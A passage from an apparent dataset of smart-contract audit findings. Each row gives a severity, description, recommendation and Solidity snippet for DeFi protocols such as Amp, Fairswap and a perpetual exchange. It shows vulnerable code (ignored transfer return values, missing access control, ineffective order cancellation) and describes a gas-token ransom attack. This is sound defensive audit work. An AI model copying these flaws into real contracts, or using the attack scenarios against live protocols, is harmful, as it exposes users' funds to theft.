\\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\n```\\nfunction transfer (address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return 
shell.transfer(\\_recipient, \\_amount);\\n}\\n\\nfunction transferFrom (address \\_sender, address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transferFrom(\\_sender, \\_recipient, \\_amount);\\n}\\n\\nfunction approve (address \\_spender, uint256 \\_amount) public nonReentrant returns (bool success\\_) {\\n // return shell.approve(\\_spender, \\_amount);\\n}\\n\\nfunction increaseAllowance(address \\_spender, uint256 \\_addedValue) public returns (bool success\\_) {\\n // return shell.increaseAllowance(\\_spender, \\_addedValue);\\n}\\n\\nfunction decreaseAllowance(address \\_spender, uint256 \\_subtractedValue) public returns (bool success\\_) {\\n // return shell.decreaseAllowance(\\_spender, \\_subtractedValue);\\n}\\n\\nfunction balanceOf (address \\_account) public view returns (uint256) {\\n // return shell.balances[\\_account];\\n}\\n```\\n\\n```\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_NO\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n```\\n\\n```\\n// function noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public returns (uint256 shellsMinted\\_) {\\n\\n// uint256 startingShells = l.proportionalDeposit(300e18);\\n\\n// uint256 gas = gasleft();\\n\\n// shellsMinted\\_ = l.depositHack(\\n// address(dai), 10e18,\\n// address(usdc), 10e6,\\n// address(usdt), 10e6,\\n// address(susd), 2.5e18\\n// );\\n\\n// emit log\\_uint(""gas for deposit"", gas - gasleft());\\n\\n\\n// }\\n```\\n",Remove all the 
commented out code or transform it into comments.,,"```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n" +Should check if the asset already exists when adding a new asset,medium,"The public function `includeAsset`\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nCalls the internal `includeAsset` implementation\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n```\\n\\nBut there is no check to see if the asset already exists in the list. 
Because the check was not done, `shell.numeraires` can contain multiple identical instances.\\n```\\nshell.numeraires.push(\\_numeraireAssimilator);\\n```\\n",Check if the `_numeraire` already exists before invoking `includeAsset`.,,"```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n" +Check return values for both internal and external calls,low,"There are some cases where functions which return values are called throughout the source code but the return values are not processed, nor checked.\\nThe returns should in principle be handled and checked for validity to provide more robustness to the code.\\nThe function `intakeNumeraire` receives a number of tokens and returns how many tokens were transferred to the contract.\\n```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n\\nSimilarly, the function `outputNumeraire` receives a destination address and an amount of token for withdrawal and returns a number of transferred tokens to the specified address.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n\\nHowever, the results are not handled in the main 
contract.\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\n```\\n\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_oBals[i].mul(\\_multiplier));\\n```\\n\\n```\\nshell.reserves[i].addr.outputNumeraire(msg.sender, \\_oBals[i].mul(\\_multiplier));\\n```\\n\\nA sanity check can be done to make sure that more than 0 tokens were transferred to the contract.\\n```\\nunit intakeAmount = shell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\nrequire(intakeAmount > 0, ""Must intake a positive number of tokens"");\\n```\\n","Handle all return values everywhere returns exist and add checks to make sure an expected value was returned.\\nIf the return values are never used, consider not returning them at all.",,"```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n" +Interfaces do not need to be implemented for the compiler to access their selectors.,low,```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n\\nThis pattern is unneeded since you can reference selectors by using the imported interface directly without any implementation. 
It increases gas costs and hinders the readability of the code.,"```\\nbytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n```\\n\\nuse the expression:\\n`IAssimilator.viewRawAmount.selector`",,```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n +Use consistent interfaces for functions in the same group,low,"This library has 2 functions.\\n`add` which receives 2 arguments, `x` and `y`.\\n```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, ""add-overflow"");\\n}\\n```\\n\\n`sub` which receives 3 arguments `x`, `y` and `\\_errorMessage`.\\n```\\nfunction sub(uint x, uint y, string memory \\_errorMessage) internal pure returns (uint z) {\\n require((z = x - y) <= x, \\_errorMessage);\\n}\\n```\\n\\nIn order to reduce the cognitive load on the auditors and developers alike, related functions should have coherent logic and interfaces. Both of the functions either need to have 2 arguments, with an implied error message passed to `require`, or both functions need to have 3 arguments, with an error message that can be specified.",Update the functions to be coherent with other related functions.,,"```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, ""add-overflow"");\\n}\\n```\\n" +Consider emitting an event when changing the frozen state of the contract,low,The function `freeze` allows the owner to `freeze` and unfreeze the contract.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n\\nThe common pattern when doing actions important for the outside of the blockchain is to emit an event when the action is successful.\\nIt's probably a good idea to emit an event stating the contract was frozen or unfrozen.,Create an event that displays the current state of the contract.\\n```\\nevent Frozen(bool frozen);\\n```\\n\\nAnd emit the event when `freeze` is
called.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n emit Frozen(\\_freeze);\\n}\\n```\\n,,```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n +Function supportsInterface can be restricted to pure,low,"The function `supportsInterface` returns a `bool` stating that the contract supports one of the defined interfaces.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n\\nThe function does not access or change the state of the contract, this is why it can be restricted to `pure`.",Restrict the function definition to `pure`.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public pure returns (bool) {\\n```\\n,,```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n +Use more consistent function naming (includeAssimilator / excludeAdapter),low,"The function `includeAssimilator` adds a new assimilator to the list\\n```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n\\nThe function `excludeAdapter` removes the specified assimilator from the list\\n```\\ndelete shell.assimilators[\\_assimilator];\\n```\\n",Consider renaming the function `excludeAdapter` to `removeAssimilator` and moving the logic of adding and removing in the same source file.,,"```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n" +Eliminate assembly code by using ABI decode,high,"There are several locations where assembly code is used to access and decode byte arrays (including uses inside loops). 
Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code.\\n```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nassembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n","As discussed in the mid-audit meeting, it is a good solution to use ABI decode since all uses of assembly simply access 32-byte chunks of data from user input. This should eliminate all assembly code and make the code significantly more clean. In addition, it might allow for more compact encoding in some cases (for instance, by eliminating or reducing the size of the flags).\\nThis suggestion can be also applied to Merkle Root verifications/calculation code, which can reduce the for loops and complexity of these functions.",,"```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n" +Ignored return value for transferFrom call,high,"When burning swap tokens the return value of the `transferFrom` call is ignored. Depending on the token's implementation this could allow an attacker to mint an arbitrary amount of Amp tokens.\\nNote that the severity of this issue could have been Critical if the Flexa token were an arbitrary token.
We quickly verified that Flexa token implementation would revert if the amount exceeds the allowance, however it might not be the case for other token implementations.\\n```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n","The code should be changed like this:\\n```\\nrequire(swapToken.transferFrom(_from, swapTokenGraveyard, amount));\\n```\\n",,"```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n" +Potentially insufficient validation for operator transfers,medium,"For operator transfers, the current validation does not require the sender to be an operator (as long as the transferred value does not exceed the allowance):\\n```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n\\nIt is unclear if this is the intention `or` whether the logical `or` should be a logical `and`.","Resolution\\nremoving `operatorTransferByPartition` and simplifying the interfaces to only `tranferByPartition`\\nThis removes the existing tranferByPartition, converting operatorTransferByPartition to it. The reason for this is to make the client interface simpler, where there is one method to transfer by partition, and that method can be called by either a sender wanting to transfer from their own address, or an operator wanting to transfer from a different token holder address. We found that it was redundant to have multiple methods, and the client convenience wasn't worth the confusion.\\nConfirm that the code matches the intention. 
If so, consider documenting the behavior (for instance, by changing the name of function `operatorTransferByPartition`.",,"```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n" +Potentially missing nonce check Acknowledged,medium,When executing withdrawals in the collateral manager the per-address withdrawal nonce is simply updated without checking that the new nonce is one greater than the previous one (see Examples). It seems like without such a check it might be easy to make mistakes and causing issues with ordering of withdrawals.\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = maxWithdrawalRootNonce;\\n```\\n\\n```\\nmaxWithdrawalRootNonce = \\_nonce;\\n```\\n,Consider adding more validation and sanity checks for nonces on per-address withdrawals.,,```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n +Unbounded loop when validating Merkle proofs,medium,"It seems like the loop for validating Merkle proofs is unbounded. If possible it would be good to have an upper bound to prevent DoS-like attacks. It seems like the depth of the tree, and thus, the length of the proof could be bounded.\\nThis could also simplify the decoding and make it more robust. For instance, in `_decodeWithdrawalOperatorData` it is unclear what happens if the data length is not a multiple of 32. 
It seems like it might result in out-of-bound reads.\\n```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n","Consider enforcing a bound on the length of Merkle proofs.\\nAlso note that if similar mitigation method as issue 5.1 is used, this method can be replaced by a simpler function using ABI Decode, which does not have any unbounded issues as the sizes of the hashes are fixed (or can be indicated in the passed objects)",,"```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n" +Mitigation for possible reentrancy in token transfers,medium,"ERC777 adds significant features to the token implementation, however there are some known risks associated with this token, such as possible reentrancy attack vector. Given that the Amp token uses hooks to communicate to Collateral manager, it seems that the environment is trusted and safe. 
However, a minor modification to the implementation can result in safer implementation of the token transfer.\\n```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n","It is suggested to move any condition check that is checking the balance to after the external call. However `_callPostTransferHooks` needs to be called after the state changes, so the suggested mitigation here is to move the require at line 1152 to after `_callPreTransferHooks()` function (e.g. 
line 1171).",,"```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n" +Potentially inconsistent input validation,medium,"There are some functions that might require additional input validation (similar to other functions):\\nAmp.transferWithData: `require(_isOperator(msg.sender, _from), EC_58_INVALID_OPERATOR);` like in\\n```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n\\nAmp.authorizeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n\\nAmp.revokeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n",Consider adding additional input validation.,,"```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n" +ERC20 compatibility of Amp token using defaultPartition,medium,"It is somewhat unclear how the Amp token ensures ERC20 compatibility. While the `default` partition is used in some places (for instance, in function balanceOf) there are also separate fields for (aggregated) balances/allowances. 
This seems to introduce some redundancy and raises certain questions about when which fields are relevant.\\n`_allowed` is used in function `allowance` instead of `_allowedByPartition` with the default partition\\nAn `Approval` event should be emitted when approving the default partition\\n```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n\\n`increaseAllowance()` vs. `increaseAllowanceByPartition()`","After the mid-audit discussion, it was clear that the general `balanceOf` method (with no partition) is not needed and can be replaced with a `balanceOf` function that returns balance of the default partition, similarly for allowance, the general `increaseAllowance` function can simply call `increaseAllowanceByPartition` using default partition (same for decreaseAllowance).",,"```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n" +Additional validation for canReceive,low,"For `FlexaCollateralManager.tokensReceived` there is validation to ensure that only the Amp calls the function. 
In contrast, there is no such validation for `canReceive` and it is unclear if this is the intention.\\n```\\nrequire(msg.sender == amp, ""Invalid sender"");\\n```\\n","Consider adding a conjunct `msg.sender == amp` in function `_canReceive`.\\n```\\nfunction \\_canReceive(address \\_to, bytes32 \\_destinationPartition) internal view returns (bool) {\\n return \\_to == address(this) && partitions[\\_destinationPartition];\\n}\\n```\\n",,"```\\nrequire(msg.sender == amp, ""Invalid sender"");\\n```\\n" +Discrepancy between code and comments,low,"There are some discrepancies between (uncommented) code and the documentations comment:\\n```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Indicates a supply refund was executed\\n \\* @param supplier Address whose refund authorization was executed\\n \\* @param partition Partition from which the tokens were transferred\\n \\* @param amount Amount of tokens transferred\\n \\*/\\nevent SupplyRefund(\\n address indexed supplier,\\n bytes32 indexed partition,\\n uint256 amount,\\n uint256 indexed nonce\\n);\\n```\\n",Consider updating either the code or the comment.,,"```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n" +Several fields could potentially be private Acknowledged,low,Several fields in `Amp` could possibly be private:\\nswapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nswapTokenGraveyard:\\n```\\naddress public constant swapTokenGraveyard = 0x000000000000000000000000000000000000dEaD;\\n```\\n\\ncollateralManagers:\\n```\\naddress[] public 
collateralManagers;\\n```\\n\\npartitionStrategies:\\n```\\nbytes4[] public partitionStrategies;\\n```\\n\\nThe same holds for several fields in `FlexaCollateralManager`. For instance:\\npartitions:\\n```\\nmapping(bytes32 => bool) public partitions;\\n```\\n\\nnonceToSupply:\\n```\\nmapping(uint256 => Supply) public nonceToSupply;\\n```\\n\\nwithdrawalRootToNonce:\\n```\\nmapping(bytes32 => uint256) public withdrawalRootToNonce;\\n```\\n,Double-check that you really want to expose those fields.,,```\\nISwapToken public swapToken;\\n```\\n
If any of the recipients of an Eth transfer is a smart contract that reverts, then the entire payout will fail and will be unrecoverable.",Implement a queuing mechanism to allow buyers/sellers to initiate the withdrawal on their own using a ‘pull-over-push pattern.'\\nIgnore a failed transfer and leave the responsibility up to users to receive them properly.,,"```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature("""")\\n );\\n require(success, ""Transfer Failed"");\\n}\\n```\\n" +Force traders to mint gas token,high,"Attack scenario:\\nAlice makes a large trade via the Fairswap_iDOLvsEth exchange. This will tie up her iDOL until the box is executed.\\nMallory makes a small trades to buy ETH immediately afterwards, the trades are routed through an attack contract.\\nAlice needs to execute the box to get her iDOL out.\\nBecause the gas amount is unlimited, when you Mallory's ETH is paid out to her attack contract, mint a lot of GasToken.\\nIf Alice has $100 worth of ETH tied up in the exchange, you can basically ransom her for $99 of gas token or else she'll never see her funds again.\\n```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n","When sending ETH, a pull-payment model is generally preferable.\\nThis would require setting up a queue, allowing users to call a function to initiate a withdrawal.",,"```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n" +Missing Proper Access Control,high,"Some functions do not have proper access control and are `public`, meaning that anyone can call them. 
This will result in a system takeover, depending on how critical those functionalities are.\\n```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), ""IDOL contract is already registered"");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n","Make the `setIDOLContract()` function `internal` and call it from the constructor, or only allow the `deployer` to set the value.",,"```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), ""IDOL contract is already registered"");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n"
For example, `inRevealingValuationPeriod` is used to allow revealing of the bid price publicly:\\n```\\nrequire(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n);\\n```\\n",Remove the test functions and use the production code for testing. The tests must have full coverage of the production code to be considered complete.,,```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n +Unreachable code due to checked conditions,medium,"```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n );\\n```\\n\\nHowever, later in the same function, code exists to introduce “Penalties for revealing too early.” This checks to see if the function was called before closing, which should not be possible given the previous check.\\n```\\n/\\*\\*\\n \\* @dev Penalties for revealing too early.\\n \\* Some participants may not follow the rule and publicate their bid information before the reveal process.\\n \\* In such a case, the bid price is overwritten by the bid with the strike price (slightly unfavored price).\\n \\*/\\nuint256 bidPrice = price;\\n\\n/\\*\\*\\n \\* @dev FOR TEST CODE RUNNING: The following if statement in L533 should be replaced by the comment out\\n \\*/\\nif (inAcceptingBidsPeriod(auctionID)) {\\n // if (false) {\\n (, , uint256 solidStrikePriceE4, ) = \\_getBondFromAuctionID(auctionID);\\n bidPrice = 
\\_exchangeSBT2IDOL(solidStrikePriceE4.mul(10\\*\\*18));\\n}\\n```\\n","Resolution\\nComment from Lien Protocol:\\nDouble-check the logic in these functions. If revealing should be allowed (but penalized in the earlier stage), the first check should be changed. However, based on our understanding, the first check is correct, and the second check for early reveal is redundant and should be removed.",,"```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n ""it is not the time to reveal the value of bids""\\n );\\n```\\n" +Fairswap: inconsistent checks on _executionOrder(),low,"The `_executionOrder()` function should only be called under specific conditions. However, these conditions are not always consistently defined.\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber >= nextExecuteBoxNumber) {\\n```\\n","Resolution\\nComment from Lien Protocol:\\nReduce duplicate code by defining an internal function to perform this check. 
A clear, descriptive name will help to clarify the intention.",,```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n +Inconsistency in DecimalSafeMath implementations,low,"There are two different implementations of `DecimalSafeMath` in the 3 FairSwap repositories.\\n```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n\\n```\\nlibrary DecimalSafeMath {\\n\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n \\n uint256 c = (a \\* 1000000000000000000) / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n",Try removing duplicate code/libraries and using a better inheritance model to include one file in all FairSwaps.,,"```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n" +Exchange - CancelOrder has no effect Pending,high,"The exchange provides means for the `trader` or `broker` to cancel the order. The `cancelOrder` method, however, only stores the hash of the canceled order in mapping but the mapping is never checked. 
It is therefore effectively impossible for a `trader` to cancel an order.\\n```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, ""invalid caller"");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n",`matchOrders*` or `validateOrderParam` should check if `cancelled[orderHash] == true` and abort fulfilling the order.\\nVerify the order params (Signature) before accepting it as canceled.,,"```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, ""invalid caller"");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n" +Perpetual - withdraw should only be available in NORMAL state Pending,high,"According to the specification `withdraw` can only be called in `NORMAL` state. However, the implementation allows it to be called in `NORMAL` and `SETTLED` mode.\\nWithdraw only checks for `!SETTLING` state which resolves to `NORMAL` and `SETTLED`.\\n```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction withdrawFromAccount(address payable guy, uint256 amount) private {\\n require(guy != address(0), ""invalid guy"");\\n require(status != LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n\\n uint256 currentMarkPrice = markPrice();\\n require(isSafeWithPrice(guy, currentMarkPrice), ""unsafe before withdraw"");\\n remargin(guy, currentMarkPrice);\\n address broker = currentBroker(guy);\\n bool forced = broker == address(amm.perpetualProxy()) || broker == address(0);\\n withdraw(guy, amount, forced);\\n\\n require(isSafeWithPrice(guy, currentMarkPrice), ""unsafe after withdraw"");\\n require(availableMarginWithPrice(guy, currentMarkPrice) >= 0, ""withdraw margin"");\\n}\\n```\\n\\nIn contrast, `withdrawFor` 
requires the state to be NORMAL:\\n```\\nfunction withdrawFor(address payable guy, uint256 amount) public onlyWhitelisted {\\n require(status == LibTypes.Status.NORMAL, ""wrong perpetual status"");\\n withdrawFromAccount(guy, amount);\\n}\\n```\\n",Resolution\\nThis issue was resolved by requiring `status == LibTypes.Status.NORMAL`.\\n`withdraw` should only be available in the `NORMAL` operation mode.,,"```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n" +Perpetual - withdrawFromInsuranceFund should check wadAmount instead of rawAmount Pending,high,"`withdrawFromInsurance` checks that enough funds are in the insurance fund before allowing withdrawal by an admin by checking the provided `rawAmount` <= insuranceFundBalance.toUint256(). `rawAmount` is the `ETH` (18 digit precision) or collateral token amount (can be less than 18 digit precision) to be withdrawn while `insuranceFundBalance` is a WAD-denominated value (18 digit precision).\\nThe check does not hold if the configured collateral has different precision and may have unwanted consequences, e.g. the withdrawal of more funds than expected.\\nNote: there is another check for `insuranceFundBalance` staying positive after the potential external call to collateral.\\n```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, ""invalid amount"");\\n require(insuranceFundBalance > 0, ""insufficient funds"");\\n require(rawAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, ""negtive insurance fund"");\\n\\n emit 